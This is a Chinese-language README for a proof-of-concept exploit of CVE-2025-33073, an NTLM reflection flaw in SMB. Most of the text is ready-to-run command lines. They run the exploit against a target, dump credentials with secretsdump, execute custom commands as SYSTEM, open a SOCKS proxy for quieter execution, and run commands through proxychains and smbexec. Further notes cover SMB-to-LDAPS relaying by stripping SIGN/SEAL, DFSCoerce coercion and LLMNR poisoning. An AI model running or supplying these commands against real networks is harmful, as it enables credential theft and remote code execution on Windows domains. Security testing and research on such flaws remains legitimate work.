针对NTLM反射SMB漏洞的PoC利用程序。
操作系统:Kali Linux(已预装大多数软件包)。
该工具将自动使用虚拟环境。要设置它,请运行:
./setup.sh
这将创建一个虚拟环境,并安装所有必需的依赖项,包括 ldap3-bleeding-edge==2.10.1.1337。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
自定义命令
除了运行secretsdump,还可以执行自定义命令。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
为了在成功建立SYSTEM连接后更隐蔽地执行命令。--target和--target-ip在此处应相同。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
还可以通过proxychains运行自定义命令,而不是转储SAM。
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

已进行相关研究,以验证当SMB签名启用时反射是否确实无效,结果发现了漏洞:如果从数据包中移除SIGN/SEAL,则可以从SMB中继到LDAPS,而通常由于MIC这是不可能的。
感谢:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
如果您与设备处于同一广播域,并且该设备容易受到LLMNR投毒攻击,则可以在无需注册DNS记录的情况下利用该设备。

进行本地NTLM身份验证

未进行本地NTLM身份验证,导致尝试失败

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073